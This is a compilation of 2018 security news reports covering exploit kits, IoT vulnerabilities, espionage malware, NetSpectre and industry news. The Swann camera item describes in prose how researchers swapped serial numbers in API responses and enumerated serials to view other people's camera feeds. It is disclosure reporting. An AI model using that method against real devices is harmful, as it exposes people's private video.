“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed the Underminer Exploit activity on July 17 while it was distributing the payloads mainly to Asian countries, mostly in Japan (69,75%) and Taiwan (10,52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.

The Underminer exploit kit appears to have been created in November 2017 when it only included the code for the exploitation of Flash vulnerabilities and delivered fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

browser profiling and filtering;
preventing of client revisits;
URL randomization;
asymmetric encryption of payloads;
The EK redirect visitors to a landing page that profile and detect the user’s Adobe Flash Player version and browser type via user-agent.

In case the visitor’s profile does not match the one associated with a target of interest, the exploit kit will not deliver malicious content and redirect the visitor to a clean website.

The Underminer exploit kit also sets a token to the browser cookie, with this trick if the victim already accessed the landing page, it only delivers an HTTP 404 error message instead of payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.
All the above flaws have been exploited by other EKs in the past.

Below the infection flow of Underminer’s exploits described by Trend Micro.Underminer modus operandi

Underminer modus operandi

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.

Security bug in Swann IoT Camera allowed to access video feeds
30.7.2018 securityaffairs IoT

Security experts have discovered a security glitch in Swann IoT camera that could be exploited by attackers to access video feeds.
Security experts from Pen Test Partners (Andrew Tierney, Chris Wade and Ken Munro) along with security researchers Alan Woodward, Scott Helme and Vangelis Stykas have discovered a security glitch in Swann IoT camera that could be exploited to access video feeds.

The experts reported the issue to the vendor that has patched the vulnerability.

The research team developed a proof-of-concept attack exploiting security flaws in the cloud service used by the IoT camera, Safe by Swann, in this way they were able to access the cameras via their mobile devices.

The experts started investigating the issue after reading a BBC article outlining how a BBC employee had accidentally seen someone else’s footage on the mobile app for their home security camera.

The affected camera model it a battery-powered HD camera that implements video streaming feature either directly over the local network or via a cloud service.

Swann IoT camera

Experts noticed that the cloud service is provided by Ozvision, when a user logs into the system through Safe by Swann, a request is made (userListAssets) to the server.

The server, in turn, provides a list containing the devices associated with the account.

The researchers analyzed the requests and attempted to manipulate the serial number parameter.

Swann IoT camera request

The experts explained that it is easy to find a serial number associated with the targeted device via the API endpoint and APK.

“After reviewing the API endpoint and APK, I quickly realised that the serial number (swnxxxxxxxxx) is the primary identifier of the camera on the platform. This is both for the Swann-specific web API and the OzVision peer-to-peer tunnel. The serial is easily found in the mobile app:” states the analysis published by the experts.

“We replace the serial number (deviceid) in the response from the server. At this point the mobile app sees the details of someone else’s camera. We are using Charles here, but Burp or MITMproxy will do it too”

The experts demonstrated that it is possible to access the camera stream for another serial number.

“In the app, one simply presses ‘play’. This made a request to deviceWakeup using the modified serial, then the Ozvision tunnel to the device was established using the modified serial. We could then watch the camera live.” continues the experts.

The experts explained that Swann quickly fixed the issue, but they speculated that the Ozvision was already aware of the issue.

“Ozvision already knew about the vulnerability, as Swann had informed them. The Swann customer camera cloud environment had quickly been fixed. Swann took swift action to fix the flaw and had a constructive dialogue with us.” continues the post.

“We suspect they knew about this issue for about nine months, and only fixed it when pressured by Swann; and we are confident the vulnerability was present in at least one other major camera brand to which they provide a cloud service. Further, they initially deflected direct questions about the issue back to Swann.”

How to discover serial numbers of existing cameras?

The serial number if composed of the string ‘swn’ plus 9 hex chars. The researcher Vangelis (@evstykas of the Tapplock API vulnerability fame) analyzed the API and discovered that it was possible to enumerate them with the following request:


1.1/osn/AccountAddDevice – this will throw an error if the camera is already paired, this means that using this trick it is possible to enumerate the entire keyspace searching for existing cameras.

“We believe the keyspace could be fully enumerated in as little as 3 days, given a distributed set of concurrent requests to the API.” concluded the researchers.

“So, one could now access arbitrary cameras.”

Mysterious snail mail from China sent to US agencies includes Malware-Laden CD
30.7.2018 securityaffairs

Several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden CD
Crooks and cyberspies attempt to exploit any attack vector to compromise the targeted computers and the case we are going to discuss demonstrate it.

The popular security expert Brian Krebs reported that several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden compact discs (CDs).

The list of recipients that received the malicious snail mail includes State Archives, State Historical Societies, and a State Department of Cultural Affairs.

KrebsOnSecurity reported having learned that the strange mail is apparently sent from China.

“This particular ruse, while crude and simplistic, preys on the curiosity of recipients who may be enticed into popping the CD into a computer. According to a non-public alert shared with state and local government agencies by the Multi-State Information Sharing and Analysis Center (MS-ISAC), the scam arrives in a Chinese postmarked envelope and includes a “confusingly worded typed letter with occasional Chinese characters.”” reads the post published by Brian Krebs.

Snail Mail Malware-Laden CD

The attackers clearly attempt to exploit the curiosity of the potential victims that may be enticed into seeing the content of the CD.

According to the experts at MS-ISAC who analyzed the CDs, the media support contain Mandarin language Microsoft Word documents, some of which including malicious scripts.

All the letters received by the organizations appear to be addressed specifically to them.

“It’s not clear if anyone at these agencies was tricked into actually inserting the CD into a government computer.” continues Krebs.

“I’m sure many readers could think of clever ways that this apparent mail-based phishing campaign could be made more effective or believable, such as including tiny USB drives instead of CDs, or at least a more personalized letter that doesn’t look like it was crafted by someone without a mastery of the English language.”

A similar attack technique has been already observed in the wild, in September 2016 the Police in the Australian State of Victoria issued a warning to the local population of malware-laden USB drives left in letterboxes.

In August 2016, at Black Hat USA, the security researcher Elie Bursztein demonstrated the dangers of found USB drive and how to create a realistic one.

The expert dropped 297 USB drives on the University of Illinois Urbana-Champaign campus in six different locations, the devices are able to take over the PC of the unaware user that will find the key.

48 percent of USB drives were picked up by passers and plugged into a computer, and the unaware users also tried to open the file within.

Social engineering attacks demonstrate that humans are the weakest link in the security chain, and attacks leveraging malware-laden CD leverage bad habit.

Tens of flaws in Samsung SmartThings Hub expose smart home to attack
30.7.2018 securityaffairs
Vulnerebility  IoT

Cisco Talos researchers found tens of flaws in Samsung SmartThings Hub controller that potentially expose smart home devices to attack
Cisco Talos researchers have discovered 20 vulnerabilities in Samsung SmartThings Hub controller that potentially expose any supported third-party smart home devices to cyber attack.

“Cisco Talos recently discovered several vulnerabilities present within the firmware of the Samsung SmartThings Hub.” reads the analysis published by Talos.

“These vulnerabilities could allow an attacker to execute OS commands or other arbitrary code on affected devices.”

The Samsung SmartThings Hub is a central controller that could be used to manage a broad range of internet-of-things (IoT) devices in a smart home, including smart plugs, LED light bulbs, thermostats, and cameras.

The access to those IoT devices could allow attackers to gather sensitive information managed by the devices within the home and perform unauthorized activities.

Samsung SmartThings Hub runs a Linux-based firmware and allows for communications with various IoT devices using various wireless standards Zigbee, Z-Wave, and Bluetooth.

Talos researchers explained that in order to exploit the flaws, the attacker needs to chain a number of existing vulnerabilities together.

“It is possible to gather the set of preconditions needed to exploit bugs that would otherwise be unreachable by using multiple vulnerabilities.” researchers said.

“This is commonly referred to as “chaining.” When considering the severity of vulnerabilities, it is essential to keep in mind that they might be used as part of a chain, as this would significantly elevate their severity.”

The experts identified three notable chains, only one of them is a remote code execution (RCE) vulnerability that can be exploited without prior authentication.

RCE Chain – CVE-2018-3911

This RCE chain attack affects the “video core” HTTP server of the hub, it could be exploited by attackers to inject HTTP requests into this process from a network. The flaw is an exploitable HTTP header injection bug that exists within the communications (via Port 39500) between the hub and the remote servers. The flaw could be exploited by sending specially crafted HTTP requests to vulnerable devices.

“This vulnerability is present within the JSON processing performed by the `hubCore` binary present within the SmartThings hub and could be combined with other vulnerabilities present within affected devices to achieve code execution.” states the report.

Samsung SmartThings Hub

Other chains

Other chains identified by the researchers could be exploited only by an authenticated attacker.

The first attack chain is a remote code execution that could be obtained by exploiting the CVE-2018-3879 flaw that allows authorized attackers to execute SQL queries against a database running in the IoT device.

Experts noticed that chaining this flaw, with a string of other memory corruption vulnerabilities (CVE-2018-3880, CVE-2018-3906, CVE-2018-3912 to CVE-2018-3917, and CVE-2018-3919) that affects the Samsung SmartThings Hub it is possible to execute arbitrary code in the network.

Experts highlighted that the CVE-2018-3879 can also be exploited in the final chain attack for remote information leakage. This vulnerability can be used to create an empty file inside the device.

“Remote information leakage: TALOS-2018-0556 can also be used to create an empty file anywhere inside the device. As described in TALOS-2018-0593, the existence of an empty file at path “/hub/data/hubcore/stZigbee” will make the “hubCore” process to crash. Moreover, as described in TALOS-2018-0594, when the “hubCore” process crashes, it triggers an information leak that can be captured from the network.” reads the analysis tublished by Talos.

“By chaining these 3 vulnerabilities in order, an attacker can obtain a memory dump of the `hubCore` process, which contains most of the core logic, and consequent sensitive information, of the Hub.”

Talos experts tested and confirmed that the Samsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17 is affected by the flaws.

Samsung has addressed the flaw and security updates have been pushed out automatically.

“Talos recommends that these devices are updated as quickly as possible. As Samsung pushes updates out to devices automatically, this should not require manual intervention in most cases. It is important to verify the updated version has actually been applied to devices to ensure that they are no longer vulnerable. Samsung has released a firmware update that resolves these issues. An advisory related to these vulnerabilities can be found here.” concludes Talos.

Microsoft Uncovers Multi-Tier Supply Chain Attack
28.7.2018 securityweek Attack

Microsoft has shared details of a new attack that attempted to spread crypto-mining malware to a large number of users by compromising the software supplying partner of an application developer.

The multi-tier attack relied on compromising the shared infrastructure between a PDF editor vendor and one of its partners that provided additional font packages for the application: the attackers aimed at the supply chain of the supply chain.

Limited in nature, Microsoft said the compromise appeared to be active between January and March 2018, and could have impacted six other vendors working with the font package provider.

Carried out silently, the attack initially appeared as a typical infection and was automatically blocked, but the same infection pattern was observed across a large number of machines.

Windows Defender APT eventually alerted on nearly 70,000 cases incidents involving a coin mining process masquerading as pagefile.sys, which was launched by a service named xbox-service.exe, Microsoft’s Windows Defender ATP Research team explains.

Microsoft's investigation revealed that a malicious installer package (MSI) was being downloaded by a PDF editor during installation, along with other legitimate installers. It was then discovered that the application vendor itself hadn’t been compromised, but the malicious package was served by a partner that creates and distributes additional font packages used by the app.

The attackers discovered a weakness in the interactions between the app vendor and its partner and also found a way to leverage it to hijack the installation chain of the MSI font packages, thus turning the PDF editor into the unexpected carrier of the malicious payload.

Microsoft discovered that the attackers had created a replica of the software partner’s infrastructure on their own server and copied and hosted all MSI files, including font packages, there. They only modified an Asian fonts package to add the malicious payload to it.

The attackers also managed to influence the download parameters used by the PDF app so as to point to their server, which resulted in the download of MSI font packages from the rogue server. Thus, users ended up installing the coin miner malware along with the legitimate application.

At device restart, the malicious MSI file would be replaced with the legitimate version. Microsoft also discovered hardcoded PDF app names in the malicious package and concluded that at least six additional vendors might have been targeted by the attackers.

“While we were not able to find evidence that these other vendors distributed the malicious MSI, the attackers were clearly operating with a broader distribution plot in mind,” Microsoft says.

Detected as Trojan:Win64/CoinMiner, the malicious miner would hide behind the name xbox-service.exe and use the infected machine’s resources to mine for Monero. The malware also attempts to prevent remote cleaning and remediation by blocking communication with the update servers of certain PDF apps.

The threat also hinted at browser scripts as an alternative form of coin mining, but it’s unclear whether this was a secondary plan or work in progress.

“This new supply chain incident did not appear to involve nation-state attackers or sophisticated adversaries but appears to be instigated by petty cybercriminals trying to profit from coin mining using hijacked computing resources,” Microsoft’s says.

A CrowdStrike report published earlier this week highlighted the increasing number of cyberattacks targeting the software supply chain. Some of the largest such incidents include the NotPetya and CCleaner incidents last year, which impacted millions.

Iranian Hackers Use QUADAGENT Backdoor in Recent Attacks
28.7.2018 securityweek CyberSpy

A series of recent attacks attributed to an Iran-linked cyber-espionage group delivered a PowerShell backdoor onto compromised machines, Palo Alto Networks has discovered.

The attacks, observed between May and June 2018, were attributed to the OilRig group, which is also known as APT34 and Helix Kitten. Active since around 2015, the actor was seen using two new backdoors (RGDoor and OopsIE) earlier this year, as well as a new data exfiltration technique.

Aimed at a technology services provider and a government entity in the Middle East, the new attacks were “made to appear to have originated from other entities in the same country” and employed the QUADAGENT backdoor, Palo Alto Networks reveals.

Both the backdoor and other attack artifacts have been previously associated with the OilRig group.

The samples were nearly identical to each other, but featured different command and control (C&C) servers and randomized obfuscation (performed with the open-source toolkit called Invoke-Obfuscation).

Between May and June, the actor launched three attacks, each involving a spear phishing email appearing to originate from a government agency based in the Middle East. The account was likely compromised via credential theft.

The first two attack waves (aimed at a technology services provider) targeted email addresses that weren’t easily discoverable via search engines. The emails contained an attached exe file (converted from .bat) that was designed to install the QUADAGENT backdoor and execute it.

The dropper would run silently, would download the backdoor, create a scheduled task for persistency, and then execute the payload. The malware used rdppath[.]com as the C&C and would attempt to connect to it via HTTPS, then HTTP, then via DNS tunneling.

The third wave (against the government entity) also used a simple PE file attachment, but compiled using the Microsoft .NET Framework instead of being converted. The victim was served a fake error box when executing the malware, in an attempt to reduce suspicion. Once dropped and executed, the backdoor would connect to the C&C at cpuproc[.]com.

A third sample collected by Palo Alto Networks did not use a PE attachment but relied on a Word document containing a malicious macro for delivery. The document displayed a decoy image and asked the user to enable content, but did not use additional decoy content after execution.

The use of Word documents as a delivery mechanism has been associated with the threat actor before, and the delivery of QUADAGENT in this manner was previously documented by ClearSky Cyber Security. The sample ClearSky analyzed appears identical with the one used in the attacks against the technology services provider, Palo Alto Networks says.

“While [OilRig’s] delivery techniques are fairly simple, the various tools we have attributed as part of their arsenal reveal sophistication. In this instance, they illustrated a typical behavior of adversary groups, wherein the same tool was reused in multiple attacks, but each had enough modifications via infrastructure change, additional obfuscation, and repackaging that each sample may appear different enough to bypass security controls,” the security firm concludes.

Iran-Linked 'Leafminer' Espionage Campaign Targets Middle East
28.7.2018 securityweek CyberSpy

A group of cyberspies believed to be operating out of Iran has targeted government and other types of organizations in the Middle East since at least early 2017, Symantec revealed on Wednesday.

According to the security firm, which tracks the threat actor as Leafminer, this is a previously undocumented campaign. Symantec has detected malware and tools associated with this group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries, but researchers uncovered a list – written in Iran’s Farsi language – of more than 800 targets whose systems were apparently scanned by the attackers. This list shows that the targeted countries also include the United Arab Emirates, Qatar, Bahrain, Egypt and Afghanistan.

A significant percentage of targets were in the financial, government and energy sectors, but several other industries were targeted as well.

Leafminer targets

Leafminer has used both custom-built malware and publicly available tools in its campaign. Its attack techniques include the use of compromised web servers as watering holes, scanning and exploitation of vulnerable network services, and dictionary attacks aimed at authentication services.

One of the servers used by Leafminer stored 112 files, including malware, tools and log files generated as a result of scans and post-compromise activities.

Some of the tools in Leafminer’s arsenal were linked to other groups with apparent ties to Iran. The hackers have also leveraged widely available tools and exploits, such as the Inception Framework leaked by Shadow Brokers, which includes the infamous EternalBlue exploit.

Leafminer has also developed its own malware, including Trojan.Imecab and Backdoor.Sorgu. Sorgu provides the attackers remote access to compromised machines, while Imecab provides persistent access with a hardcoded password.

Another custom tool used by the threat actor is a modified version of the popular Mimikatz post-exploitation tool. The attackers attempt to avoid detection using a technique dubbed Process Doppelgänging, which researchers disclosed late last year. Symantec has also seen attempts to find systems vulnerable to Heartbleed attacks.

Leafminer also appears to be inspired by the Russia-linked Dragonfly group. A technique used by Dragonfly in watering hole attacks has also been spotted in the Leafminer campaign, researchers said.

Symantec pointed out that the group is “eager to learn from and capitalize on tools and techniques used by more advanced threat actors” and that it has been “tracking developments in the world of cyber security.”

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” Symantec said.

Google Announces New Security Tools for Cloud Customers
28.7.2018 securityweek Security

Google on Wednesday took the wraps off a broad range of tools to help cloud customers secure access to resources and better protect data and applications.

To improve security and deliver flexible access to business applications on user devices, Google has introduced context-aware access, which brings elements from BeyondCorp to Google Cloud.

With context-aware access, Google explains that organizations can “define and enforce granular access to GCP APIs, resources, G Suite, and third-party SaaS apps based on a user’s identity, location, and the context of their request.” This should increase security posture and decrease complexity for users, allowing them to log in from anywhere and any device.

The new capabilities are now available for select VPC Service Controls customers and should soon become available for those using Cloud Identity and Access Management (IAM), Cloud Identity-Aware Proxy (IAP), and Cloud Identity.

For increased protection against credential theft, Google announced Titan Security Key, “a FIDO security key that includes firmware developed by Google to verify its integrity.” Meant to protect users from the potentially damaging consequences of credential theft, Titan Security Keys are now available to Google Cloud customers and will soon arrive in Google Store.

Also revealed on Wednesday, Shielded VMs were designed to ensure that virtual machines haven’t been tampered with and allow users to monitor and react to any changes in the VM baseline or its current runtime state. Shielded VMs can be easily deployed on websites.

According to Google, organizations running containerized workloads should also ensure that only trusted containers are deployed on Google Kubernetes Engine. For that, the Internet giant announced Binary Authorization, which allows for the enforcing of signature validation when deploying container images.

Coming soon to beta, the tool allows for integration with existing CI/CD pipelines “to ensure images are properly built and tested prior to deployment” and can also be combined with Container Registry Vulnerability Scanning to detect vulnerable packages in Ubuntu, Debian and Alpine images before deployment.

Google also announced the beta availability of geo-based access control for Cloud Armor, a distributed denial of service (DDoS) and application defense service. The new capability allows organizations to control access to their services based on the geographic location of the client.

Cloud Armor, however, can also be used for “whitelisting or blocking traffic based on IP addresses, deploying pre-built rules for SQL injection and cross-site scripting, and controlling traffic based on Layer 3-Layer 7 parameters of your choice.”

Cloud HSM, a managed cloud-hosted hardware security module (HSM) service coming soon in beta, allows customers to host encryption keys and perform cryptographic operations in FIPS 140-2 Level 3 certified HSMs and to easily protect sensitive workloads without having to manage a HSM cluster.

Courtesy of tight integration with Cloud Key Management Service (KMS), Cloud HSM makes it “simple to create and use keys that are generated and protected in hardware and use it with customer-managed encryption keys (CMEK) integrated services such as BigQuery, Google Compute Engine, Google Cloud Storage and DataProc,” Google says.

Earlier this year, the search company launched Asylo, an open source framework and software development kit (SDK) meant to “protect the confidentiality and integrity of applications and data in a confidential computing environment.”

With Access Transparency, Google logs the activity of Google Cloud Platform administrators who are accessing content. While GCP’s Cloud Audit Logs no longer provide visibility into the actions of administrators when the cloud provider’s Support or Engineering team is engaged, Access Transparency captures “near real-time logs of manual, targeted accesses by either support or engineering.”

Google also announced the investigation tool for G Suite customers, to help identify and act upon security issues within a domain. With this tool, admins can “conduct organization-wide searches across multiple data sources to see which files are being shared externally” and then perform bulk actions on limiting files access.

Google is also making it easier to move G Suite reporting and audit data from the Admin console to Google BigQuery. Furthermore, there are five new container security partner tools in Cloud Security Command Center to help users gain more insight into risks for containers running on Google Kubernetes Engine.

To meet customer requirements on where their data is stored, Google announced data regions for G Suite, a tool that allows G Suite Business and Enterprise customers “to designate the region in which primary data for select G Suite apps is stored when at rest—globally, in the U.S., or in Europe.”

To these, Google adds the Password Alert policy for Chrome Browser, which allows IT admins to “prevent their employees from reusing their corporate password on sites outside of the company’s control, helping guard against account compromise.”

Tenable Soars on IPO Day
28.7.2018 securityweek IT

Tenable Holdings, parent of veteran cybersecurity firm Tenable Network Security, celebrated its much-anticipated initial public offering (IPO) by raising roughly $250 million through the sale of 10.9 million shares at $23 per share.

The Columbia, Md.-based company began trading on the Nasdaq Global Select Market on Thursday under the ticker symbol “TENB”.

Joe Brantuck of Nasdaq with Tenable CEO Amit YoranShares of the company jumped more than 45% in early trading, reaching nearly $34 per share at the time of publishing, pushing the company’s market cap above $3 billion.

Founded in 2002, Tenable is known for its vulnerability scanners and software solutions that help find network security gaps. The company has more than 24,000 customers across 160 countries, including more than 50 percent of Fortune 500 companies and nearly 30 percent of Global 2000 firms.

In late 2017, Tenable announced a partnership with Siemens that aims to provide asset discovery and vulnerability management solutions for industrial networks.

Before going public, Tenable had raised more than $300 million, including $250 million in November 2015 and $50 million in September 2012.

Currently led by CEO Amit Yoran, former President of RSA and former National Cybersecurity Director at the U.S. Department of Homeland Security, Tenable had revenue of $187.7 million in 2017 and reported a net loss of $41 million for the year.

Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.2018 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to national agencies demanding a collaboration on ending the government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill-off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the inherited security vulnerabilities in the plugin as the main reason to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) has warned about the risks of using Flash nearly a decade ago, the letter also reads.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threat.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.

Dutch Court Sentences CoinVault Ransomware Authors to Community Service
28.7.2018 securityweek

Two Dutch men were sentenced on Thursday to 240 hours of community service for creating and using the CoinVault ransomware.

The suspects are brothers, identified by Dutch media as Melvin and Dennis van den B., currently aged 25 and 21, respectively. They were both arrested in 2015 and accused of creating CoinVault, one of the first pieces of file-encrypting ransomware, and its successor, Bitcryptor.

Their trial took place on July 12 and they have now been sentenced to 240 hours of community service, which is the maximum time of community service someone can serve. They have also been ordered to pay restitution to some of their victims.

Prosecutors asked for a three-month prison sentence and nine months suspended in addition to community service. However, the sentence has been reduced due to the fact that the brothers cooperated with the police, including to help victims recover their files, and have not committed any other crimes since their arrest in 2015.

The suspects were accused of hacking into computers and extorting nearly 1,300 individuals. However, Kaspersky Lab, which investigated CoinVault back in 2014 when the threat emerged and helped police identify the hackers, noted that there were actually roughly 14,000 victims worldwide.

A decryption tool for the CoinVault ransomware is available from the NoMoreRansom initiative, but some victims have not been able to recover their files due to some implementation errors that prevented recovery even with the decryption keys.

The cybercriminals were identified by Dutch police after Kaspersky researchers found a first name in the malware code. According to some reports, the CoinVault authors also failed to hide their real IP address on at least one occasion.

“Cybercrime doesn’t pay,” said Kaspersky Lab researcher Jornt van der Wiel, commenting on the case. “If you become a victim of criminal or ransomware activity, keep your files and report the incident to the police. Never pay the ransom and be confident that not only will the decryption tool appear, but also that justice will triumph in regards to the criminals.”

Parasite HTTP RAT Packs Extensive Protection Mechanisms
28.7.2018 securityweek

A newly discovered remote access Trojan (RAT) dubbed Parasite HTTP includes a broad range of protections, including sandbox detection, anti-debugging, anti-emulation, and more, Proofpoint reports.

Dubbed Parasite HTTP, the malware is being advertised on an underground forum and has already been used in an infection campaign. Courtesy of a modular architecture, the malware’s capabilities can be expanded with the addition of new modules after infecting a system.

The threat was recently used in a small email campaign targeting recipients primarily in the information technology, healthcare, and retail industries. The emails contained Microsoft Word attachments with malicious macros designed to download the RAT from a remote site.

Written in C, the tool is advertised as having no dependencies, a small size of around 49Kb, and plugin support. Moreover, its author claims the malware supports dynamic API calls, has encrypted strings, features a secure command and control (C&C) panel written in PHP, can bypass firewalls, and features encrypted communications.

Among other features, the author also advertises a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” Proofpoint says.

In addition to string obfuscation, Parasite HTTP features a sleep routine to delay execution and check for sandboxes or emulation. It first checks if an exception handler has run, then checks “whether between 900ms and two seconds elapsed in response to the routine’s 1 second sleep split into 10ms increments.”

When detecting a sandbox, the malware does not simply exit or throw an error, but attempts to make it more difficult to determine why it crashed. The RAT also uses code from a public repository for sandbox detection.

“Parasite HTTP also contains a bug caused by its manual implementation of a GetProcAddress API that results in the clearing code not executing,” Proofpoint's security researchers warn.

On Windows 7 and newer versions, the threat resolves critical APIs for creating its registry values. It also uses a process injection technique that isn’t used by major malware families.

The malware includes an obfuscated check for debugger breakpoints within a range of its own code. Parasite HTTP also removes hooks on a series of DLLs, but only restores the first 5 bytes to the original, which would likely result in a crash if a sandbox is using an indirect jump (6 bytes) for its hooks.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint says.

Remote Spectre Attack Allows Data Theft Over Network
28.7.2018 securityweek Attack

A team of researchers from the Graz University of Technology in Austria has demonstrated that Spectre attacks can be launched remotely without the need to execute code on the targeted machine.

The researchers, some of which were also involved in the discovery of the original Meltdown and Spectre vulnerabilities, have dubbed the new attack NetSpectre as it allows a remote attacker to read arbitrary memory data over the network.

NetSpectre attacks have been successfully conducted by the experts both in a local area network (LAN) and between virtual machines in Google Cloud.

While NetSpectre attacks can in theory pose a significant risk, data can only be leaked very slowly. Researchers achieved an exfiltration rate of 15 bits per hour over a local network, and 60 bits per hour by using a new AVX-based covert channel instead of a cache covert channel. This is the first Spectre attack that does not use a cache covert channel.NetSpectre - Spectre attacks can be launched remotely

In experiments conducted using Google Cloud, researchers managed to leak data from an independent virtual machine at a rate of 3 bits per hour.

The Spectre and Meltdown speculative execution vulnerabilities impact processors from Intel, AMD, ARM and other companies, and they allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. There are several variants of each flaw, but the original vulnerabilities are Spectre (Variant 1 and Variant 2) and Meltdown (Variant 3).

Exploitation of these flaws has required executing arbitrary code on the targeted system, but NetSpectre, which is related to Variant 1, shows that remote attacks are possible without executing code on the victim’s device.

Researchers also demonstrated that this remote attack method can also be used to break the address-space layout randomization (ASLR) mitigation even if no data is leaked.

Fortunately, NetSpectre attacks can be prevented using the mitigations recommended for the original Spectre. In addition, since this is a network-based attack, network-layer countermeasures can also be efficient in blocking threats.

“A trivial NetSpectre attack can easily be detected by a DDoS protection, as multiple thousand identical packets are sent from the same source,” researchers explained. “However, an attacker can choose any trade-off between packets per second and leaked bits per second. Thus, the speed at which bits are leaked can simply be reduced below the threshold that the DDoS monitoring can detect. This is true for any monitoring which tries to detect ongoing attacks, e.g., intrusion detection systems. Although the attack is theoretically not prevented, at some point the attack becomes infeasible, as the time required to leak a bit increases drastically.”

However, experts warned that new methods may be found in the future that bypass current protections and mitigations.

Intel has updated its whitepaper titled “Analyzing potential bounds check bypass vulnerabilities” to include NetSpectre attacks.

Jon Masters, Chief Arm Architect and Computer Microarchitecture Lead at Red Hat, says his company has “not identified any viable userspace spectre gadget attacks but are actively auditing all of the daemons that listen over the network and the rest of the stack.”

Twitter removed more than 143,000 apps from the messaging service
28.7.2018 securityaffairs

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.
Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.


We’re committing Twitter to help increase the collective health, openness, and civility of public conversation, and to hold ourselves publicly accountable towards progress.

5:33 PM - Mar 1, 2018 · San Francisco, CA
11.7K people are talking about this
Twitter Ads info and privacy
The social media giant was restricting the access to its application programming interfaces (APIs) that allows developers to automate the interactions with the platform (i.e. Tweet posting).

Spam and abuse issues are important problems for the platform, every day an impressive number of bots is used to influence the sentiment on specific topics or to spread misinformation or racism content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter it a hard task, now since Tuesday, Twitter deployed a new application process for developers that intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.”Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service,”

Twitter messaging service

Anyway, there are many legitimate applications that used Twitter APIs to automate several processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

